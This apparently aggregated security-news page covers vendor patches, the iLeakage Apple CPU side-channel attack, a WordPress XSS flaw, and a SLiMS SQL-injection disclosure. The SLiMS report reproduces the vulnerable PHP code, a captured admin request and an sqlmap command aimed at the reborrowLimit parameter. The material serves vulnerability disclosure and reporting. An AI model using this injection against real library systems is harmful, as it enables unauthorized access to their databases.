Cisco “strongly recommends that customers disable the HTTP Server feature on all internet-facing systems or restrict its access to trusted source addresses,” the firm wrote in an advisory.

VMWare

VMWare has patched two out-of-bounds write and information disclosure vulnerabilities in its vCenter Server. Tracked as CVE-2023-34048, the first is a vulnerability in the implementation of the DCERPC protocol that could lead to remote code execution. VMware has rated the flaw as critical with a CVSS base score of 9.8.

At the other end of the CVSS scale but still worth mentioning is CVE-2023-34056, a partial information disclosure bug with a score of 4.3. “A malicious actor with non-administrative privileges to vCenter Server may leverage this issue to access unauthorized data,” VMWare wrote in an advisory.

Citrix

Enterprise software firm Citrix has issued urgent fixes for vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway). Tracked as CVE-2023-4966 and with a CVSS score of 9.4, the first bug could allow an attacker to expose sensitive information.

CVE-2023-4967 is a denial of service issue with a CVSS score of 8.2. Exploits of CVE-2023-4966 on unmitigated appliances “have been observed,” Citrix said. “Cloud Software Group strongly urges customers of NetScaler ADC and NetScaler Gateway to install the relevant updated versions of NetScaler ADC and NetScaler Gateway as soon as possible.”

SAP

SAP’s October Security Patch Day saw the release of seven new security notes, all of which were rated as having a medium impact. Tracked as CVE-2023-42474, the worst flaw is a cross-site scripting vulnerability in SAP BusinessObjects Web Intelligence with a CVSS score of 6.8.

With only nine new and updated security notes, SAP’s October Patch Day “belongs to the calmest of the last five years,” security firm Onapsis said.

While SAP’s October flaw count was much smaller than its peers’, attackers are still out there, so you should still keep up to date and get patching as soon as you can.

Apple, Google, and Microsoft Just Patched Some Spooky Security Flaws

SQL injection vulnerability in Senayan Library Management Systems Slims v.9 and Bulian v.9.6.1 allows a remote attacker to obtain sensitive information and execute arbitrary code via a crafted script to the reborrowLimit parameter in the member_type.php.

**The Bug**

A SQL Injection has found in admin/modules/membership/member_type.php at the code below

    $data['member_type_name'] = $dbs->escape_string($memberTypeName);
    $data['loan_limit'] = trim($_POST['loanLimit']);
    $data['loan_periode'] = trim($_POST['loanPeriode']);
    $data['enable_reserve'] = $_POST['enableReserve'];
    $data['reserve_limit'] = $_POST['reserveLimit'];
    $data['member_periode'] = $_POST['memberPeriode'];
    $data['reborrow_limit'] = $_POST['reborrowLimit'];
    $data['fine_each_day'] = $_POST['fineEachDay'];
    $data['grace_periode'] = $_POST['gracePeriode'];
    $data['input_date'] = date('Y-m-d');
    $data['last_update'] = date('Y-m-d');
    

**To Reproduce**

Steps to reproduce the behavior:

1.  Login as admin or user that has access membership type
    
2.  Make sure the burp application is turned on to capture the request as screenshot below  
    
3.  Save the request in a separate file (sample.reg)  
    sample.reg example
    

    POST /slims9_bulian-9.6.1/admin/modules/membership/member_type.php?itemID=2&detail=true&ajaxload=1& HTTP/1.1
    Host: localhost
    Content-Length: 1420
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQUBKpazqdLdsHspa
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Referer: http://localhost/slims9_bulian-9.6.1/admin/index.php?mod=membership
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: SenayanAdmin=f5581i7ero1b1mitlh328upvmt; admin_logged_in=1; SenayanMember=37qocaml59lu0snk1tt3n74qgn
    Connection: close
    
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="csrf_token"
    
    29ad9eb49edd5718652dff82f33e7ecb4000e5f376eac9d52346c6843c5b9d16
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="form_name"
    
    mainForm
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberTypeName"
    
    abcdef
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="loanPeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="enableReserve"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reserveLimit"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="memberPeriode"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="reborrowLimit"
    
    4423
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="fineEachDay"
    
    1
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="gracePeriode"
    
    0
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="saveData"
    
    Update
    ------WebKitFormBoundaryQUBKpazqdLdsHspa
    Content-Disposition: form-data; name="updateRecordID"
    
    2
    ------WebKitFormBoundaryQUBKpazqdLdsHspa--
    
    
    

run the test with the following command:

    sqlmap -r example.req --level 5 --risk 3 -p reborrowLimit --random-agent --dbms=mysql --current-user
    

5.  You've entered into the system  
    

**Screenshots**

**Versions**

*   OS: Windows
*   Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit)
*   Slims Version: slims9\_bulian-9.6.1

CVE-2023-45996: Vuln0wned Report: SQL Injection in member_type.php · Issue #216 · slims/slims9_bulian

The Simple Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via shortcodes in versions up to, and including, 1.0.20 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-5566: shortcodes.php in smpl-shortcodes/tags/1.0.20/includes – WordPress Plugin Repository

The "iLeakage" attack affects all recent iPhone, iPad, and MacBook models, allowing attackers to peruse your Gmail inbox, steal your Instagram password, or scrutinize your YouTube history.

Researchers have developed a side-channel exploit for Apple CPUs, enabling sophisticated attackers to extract sensitive information from browsers.

Side-channel attacks are usually overlooked, often physical counterparts to traditional software hacks. Rather than an unsecured password or a vulnerability in a program, they take advantage of the extra information a computer system or hardware generates — in the form of sound, light, or electromagnetic radiation, for example, or in the time it takes to complete certain computations (a timing attack).

On Wednesday, four researchers — including two of those responsible for uncovering the Spectre processor vulnerability back in 2018 — published the details of such an attack, which they've named "iLeakage," affecting all recent iPhone, iPad, and MacBook models.

The researchers informed Apple of their findings on Sept. 12, 2022, according to their website, and the company has since developed a mitigation. However, it's still considered unstable, it's not enabled on devices by default, and mitigating is only possible on Macs, not mobile devices.

In comments provided to Dark Reading on background, an Apple spokesperson wrote, "This proof of concept advances our understanding of these types of threats. We are aware of the issue and it will be addressed in our next scheduled software release."

**How iLeakage Works**

iLeakage takes advantage of A- and M-series Apple silicon CPUs' capacity to perform speculative execution.

Speculative execution is a method by which modern CPUs predict tasks before they're even prompted, in order to speed up information processing. "This technique has been around for over 20 years, and today all modern CPUs use it — it significantly speeds up processing, even accounting for times it might get the anticipated instructions wrong," explains John Gallagher, vice president of Viakoo Labs.

The rub is that "cache inside the CPU holds a lot of valuable data, including what might be staged for upcoming instructions. iLeakage uses the Apple WebKit capabilities inside a browser to use JavaScript to gain access to those contents."

Specifically, the researchers used a new speculation-based gadget to read the contents of another webpage when a victim clicked on their malicious webpage.

"Alone, WebKit would not enable the cache contents to be divulged, nor would how A-Series and M-Series perform speculative execution — it's the combination of the two together that leads to this exploit," Gallagher explains.

**A Successor to Meltdown/Spectre**

"This builds on a line of attacks against CPU vulnerabilities that started around 2017 with Meltdown and Spectre," Lionel Litty, chief security architect at Menlo Security points out. "High level, you want to think about applications and processes, and trust that the operating system with help from the hardware is properly isolating these from one another," but those two exploits broke the fundamental isolation between different applications, and an application and operating system, that we tend to take for granted as users, he says.

iLeakage, then, is a spiritual successor that focuses on breaking the isolation between browser tabs.

The good news is, in their website's FAQ section, the researchers described iLeakage as "a significantly difficult attack to orchestrate end-to-end," which "requires advanced knowledge of browser-based side-channel attacks and Safari's implementation." They also noted that successful exploitation hasn't been demonstrated in the wild.

Were a capable enough attacker to come along and try it, however, this method is powerful enough to siphon just about any data users traffic online: logins, search histories, credit card details, what have you. In YouTube videos, the researchers demonstrated how their exploit could expose victims' Gmail inboxes, their YouTube watch histories, and their Instagram passwords, as just a few examples.

**iPhone Users Are Especially Affected**

Though it takes advantage of the idiosyncrasies in Safari's JavaScript engine specifically, iLeakage affects all browsers on iOS, because Apple's policies force all iPhone browser apps to use Safari's engine.

"Chrome, Firefox and Edge on iOS are simply wrappers on top of Safari that provide auxiliary features such as synchronizing bookmarks and settings. Consequently, nearly every browser application listed on the App Store is vulnerable to iLeakage," the researchers explained.

iPhone users are doubly in trouble, because the best fix Apple has released thus far only works on MacBooks (and, for that matter, only in an unstable state). But for his part, Gallagher backs Apple's ability to design an effective remediation.

"Chip-level vulnerabilities are typically hard to patch, which is why it is not surprising that there is not a fix for this right now. It will take time, but ultimately if this becomes a real exploited vulnerability a patch will likely be available," he says.

Tag

#webkit